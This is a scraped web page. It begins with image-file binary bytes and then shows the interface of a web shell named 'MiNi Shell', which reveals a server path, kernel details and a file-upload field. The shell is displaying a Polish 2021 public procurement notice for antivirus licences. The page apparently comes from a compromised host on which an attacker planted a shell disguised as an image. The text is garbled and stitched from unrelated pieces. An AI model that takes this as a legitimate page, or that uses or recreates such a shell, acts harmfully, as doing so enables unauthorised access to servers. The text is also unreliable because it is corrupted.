JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211126/0028671002-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa 1000 sztuk 3-letniej licencji oprogramowania antywirusowego dla stacji roboczych, serwerów plików i urządzeń mobilnych wraz z sandboxingiem w chmurze, szyfrowaniem dysków, subskrypcją wzor... </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Główny Instytut Górnictwa</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000023461</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Gwarków 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-166</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 259 2342</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">makolczyk@gig.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gig.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Instytut Badawczy </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa 1000 sztuk 3-letniej licencji oprogramowania antywirusowego dla stacji roboczych, serwerów plików i urządzeń mobilnych wraz z sandboxingiem w chmurze, szyfrowaniem dysków, subskrypcją wzor... </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-98fb63dd-4ebd-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00286710</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.gig.eu/przetarg/3048/dostawe-1000-sztuk-3-letniej-licencji-oprogramowania-antywirusowego-dla-stacji-roboczych-serwerow-plikow-i-urzadzen-mobilnych <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/ ;<br/>https://epuap.gov.pl/wps/portal; mwallenburg@gig.eu ; makolczyk@gig.eu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia, komunikacja między Zamawiającym <br/>a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal <br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji. <br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi.aspx oraz Regulaminie ePUAP. <br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego regulaminu. <br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB. <br/>6. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na ePUAP. <br/>7. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta Wykonawcy i załączniki do oferty) odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji). Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem postępowania nadanym przez Zamawiającego, tj. FZ-1/5614/MKO/21/FI Zamawiający i Wykonawca mogą również komunikować się ze sobą za pomocą poczty elektronicznej, adres e- mail: mwallenburg@gig.eu, makolczyk@gig.eu.<br/>8. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres email: mwallenburg@gig.eu, makolczyk@gig.eu). Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020r. (Dz.U. z 2020r., poz. 2452). <br/>9. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna dotycząca przetwarzania<br/>danychosobowych:I. Zgodnie z art. 13 ust. 1 i ust. 2 ogólnego Rozporządzenia Parlamentu<br/>Europejskiego iRady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku zprzetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchyleniadyrektywy 95/46/WE (dalej: RODO) informuję, że:1.Administratorem Pani/Pana danych<br/>osobowych jestGłówny Instytut Górnictwa z siedzibą przy Pl. Gwarków 1 w Katowicach, 40-166, tel.: 32<br/>259 20 00,fax: 32 259 65 33.2.Inspektor Ochrony Danych dostępny jest pod adresem:<br/>gdpr@gig.eu.3.Daneosobowe są przetwarzane w celu przeprowadzenia postępowania o udzielenie<br/>zamówieniapublicznego na podstawie art. 6 ust.1 lit. c RODO - w celu przeprowadzenia postępowania<br/>o udzieleniezamówienia publicznego – podstawą prawną ich przetwarzania jest ciążący na<br/>Administratorzeobowiązek prawny stosowania sformalizowanych procedur udzielania zamówień<br/>publicznych.4.W raziezawarcia wskutek przeprowadzonej przez Administratora procedury o udzielenie<br/>zamówieniapublicznego umowy dane osobowe przetwarzane są w celu zawarcia i realizacji tej umowy<br/>napodstawie:a)art. 6 ust. 1 lit. b) RODO – przetwarzanie jest niezbędne do zawarcia i realizacji umowy<br/>lubczynności poprzedzających jej realizację;b)art. 6 ust. 1 lit. c) RODO – przetwarzanie jest niezbędne<br/>dowykonania obowiązków ciążących na Administratorze, wynikających z przepisów prawa, w<br/>tymprzepisów prawa zamówień publicznych i prawa podatkowego;c)art. 6 ust. 1 lit. f) RODO –<br/>przetwarzanie jest niezbędne dla realizacji prawnie uzasadnionych interesów Administratora, w<br/>tymdochodzenia lub odpierania ewentualnych roszczeń.5.Przysługuje Pani/Panu prawo do:a)dostępu<br/>dotreści danych osobowych oraz ich sprostowania, przy czym skorzystanie z prawa do sprostowania<br/>lubuzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznegoani zmianą postanowień umowy w zakresie niezgodnym z ustawą Prawo zamówień<br/>publicznych oraznie może naruszać integralności protokołu oraz jego załączników;b)ograniczenia<br/>przetwarzania danychosobowych z zastrzeżeniem przypadków, o których mowa w art.18 ust. 2 RODO,<br/>przy czym prawo doograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celuzapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw<br/>innej osoby fizycznejlub prawnej lub z uwagi na ważne względy interesu publicznego Unii Europejskiej<br/>lub państwaczłonkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończeniapostępowania o udzielenie zamówienia;c)wniesienia sprzeciwu, zażądania zaprzestania<br/>przetwarzaniai przenoszenia danych – w zakresie określonym w przepisach RODO;d)wniesienia skargi<br/>do organunadzorczego jakim jest Prezes Urzędu Ochrony Danych Osobowych gdy uzna Pani/Pan,<br/>żeprzetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.6.Podanie<br/>danychosobowych jest dobrowolne, lecz niezbędne do realizacji celów, w jakich dane są przetwarzane.<br/>Wprzypadku niepodania danych osobowych udział w postępowaniu o udzielenie zamówienia<br/>publicznegooraz zawarcie i realizacja umowy nie będzie możliwe. Niezbędność podania przez<br/>Panią/Pana danych osobowych w związku z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego jest wymogiem ustawowym, określonym w przepisach ustawy Prawo zamówień<br/>publicznych, związanym z udziałem w postępowaniu o udzielenie zamówieniapublicznego.7.Udostępnione przez Panią/Pana dane osobowe mogą być udostępnione innym<br/>podmiotom w celu wykonania na zlecenie Administratora czynności związanych z realizacją celów<br/>przetwarzania. Odbiorcami danych mogą być również instytucje upoważnione z mocy prawa, w tym<br/>podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art.18 oraz art.74<br/>ustawy Prawo zamówień publicznych .Ciąg dalszy treści niniejszego punktu w Sekcji IX - Pozostałe<br/>informacje</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FZ-1/5614/MKO/21/FI</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 284552,85 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 74000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia w ramach niniejszego postępowania jest dostawa1000 sztuk 3-letniej licencji oprogramowania antywirusowego dla stacji roboczych, serwerów plików i urządzeń mobilnych wraz z sandboxingiem w chmurze, szyfrowaniem dysków, subskrypcją wzorców wirusów i wsparciem technicznym.<br/>WYMAGANIA OGÓLNE<br/>Typ oferowanej licencji powinien uwzględniać status Zamawiającego – instytut badawczy podporządkowany Ministrowi Aktywów Państwowych.<br/>Zamawiający wymaga, aby zachowana została ciągłość w ochronie antywirusowej posiadanych przez Zamawiającego stacji roboczych, serwerów plików i urządzeń mobilnych.<br/>Zakres wsparcia technicznego:<br/>•	prawo do aktualizacji oprogramowania do nowszych wersji w trakcie obowiązywania licencji;<br/>•	wsparcie dostępne w dni robocze drogą mailową oraz telefoniczną (w godzinach od 8:00 do 18:00);<br/>•	pomoc techniczna w zakresie konfiguracji i administracji produktem oraz obejmująca rozwiązywanie typowych problemów z oprogramowaniem;<br/>•	wsparcie techniczne do oprogramowania świadczone w języku polskim, autoryzowane przez producenta oprogramowania.<br/><br/>Zamawiający ma obecnie 1 000 licencji ESET Protect Essential On-Prem i ESET Dynamic Threat Defense ważnych do 22.12.2021 r.<br/>Wymóg wdrożenia oprogramowania (dotyczy sytuacji, w której Wykonawca zaoferuje inne oprogramowanie antywirusowe, niż to które obecnie posiada Zamawiający).<br/><br/>Wykonawca wdroży system antywirusowy u Zamawiającego. Wdrożenie obejmuje: instalację serwera/konsoli zarządzania, deinstalacja istniejących instancji oprogramowania ESET u Zamawiającego (środowisko nie jest zarządzane zdalnie, a więc nie jest w domenie), przeszkolenie personelu technicznego (max. 10 osób) w zakresie użytkowania, zarządzania oraz administrowania programem. Wdrożenie oprogramowania wraz ze szkoleniami (czas trwania szkoleń - minimum: 16h) musi być przeprowadzone maksymalnie w ciągu 4 tygodni od podpisania umowy.<br/>Szczegółowe wymagania funkcjonalne stanowią załącznik nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48000000-8 - Pakiety oprogramowania i systemy informatyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie ofert zostaną poddane tylko oferty niepodlegające odrzuceniu.<br/>Cena brutto (z podatkiem VAT) za realizację przedmiotu zamówienia, na którą powinny składać się<br/>wszelkie koszty ponoszone przez Wykonawcę -100 %<br/>Przy ocenie ofert wartość wagowa wyrażona w procentach będzie wyrażona w punktach (1% = 1 pkt).<br/>Maksymalna liczba punktów w kryterium równa jest określonej wadze kryterium w %. Uzyskana liczba<br/>punktów w ramach kryterium zaokrąglana będzie do drugiego miejsca po przecinku.<br/>Przyznawanie ilości punktów poszczególnym ofertom w kryterium „cena brutto” odbywać się będzie wg<br/>następującej zasady:<br/>X punktów = (najniższa cena brutto występująca w ofertach* x 100)/ cena brutto oferty ocenianej<br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>Wyliczenie zostanie dokonane z dokładnością do dwóch miejsc po przecinku. Maksymalna ilość<br/>punktów: 100. Za ofertę najkorzystniejszą będzie uznana oferta, która przy uwzględnieniu powyższego<br/>kryterium otrzyma najwyższą punktację.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty należy dołączyć oświadczenie o niepodleganiu wykluczeniu w postaci elektronicznej<br/>opatrzone jednym z następujących podpisów: kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym, a następnie wraz z plikami stanowiącymi ofertę skompresować do<br/>jednego pliku archiwum. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania -<br/>wzór oświadczenia o niepodleganiu wykluczeniu stanowi Załącznik nr 2 do SWZ. W przypadku<br/>wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepoleganiu wykluczeniu<br/>składa każdy z Wykonawców.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenie o niepodleganiu wykluczeniu z postępowania (załącznik nr 2 do SWZ), składa<br/>każdy z Wykonawców.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, składają w formularzu<br/>ofertowym (załącznik nr 1 do SWZ) oświadczenie, z którego wynika, które dostawy wykonają<br/>poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy<br/>(podwykonawcom).<br/>6. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych<br/>części zamówienia.<br/>7. Zamawiający wymaga, aby w przypadku powierzenia części zamówienia podwykonawcom,<br/>Wykonawca wskazał w ofercie (załącznik nr 1 do SWZ) części zamówienia, których wykonanie<br/>zamierza powierzyć podwykonawcom oraz podał (o ile są mu wiadome na tym etapie) nazwy<br/>(firmy) tych podwykonawców.<br/>8. Powierzenie wykonania części zamówienia podwykonawcy nie zwalnia wykonawcy<br/>z odpowiedzialności za należyte wykonanie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszystkie przesłanki i zakresy zmiany umowy oraz warunki ich wprowadzenia zawiera załącznik<br/>nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-08 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ciąg dalszy treści z pkt. 3.15.) RODO (obowiązek informacyjny):8.Udostępnione<br/>przezPanią/Pana dane nie będą podlegały udostępnieniu do państwa trzeciego lub do<br/>organizacjimiędzynarodowej.9.Udostępnione przez Panią/Pana dane osobowe nie będą<br/>przetwarzane wsposób zautomatyzowany oraz w formie profilowania.II. Jednocześnie<br/>Zamawiający przypominao ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z<br/>art.14 RODO względemosób fizycznych, których dane przekazane 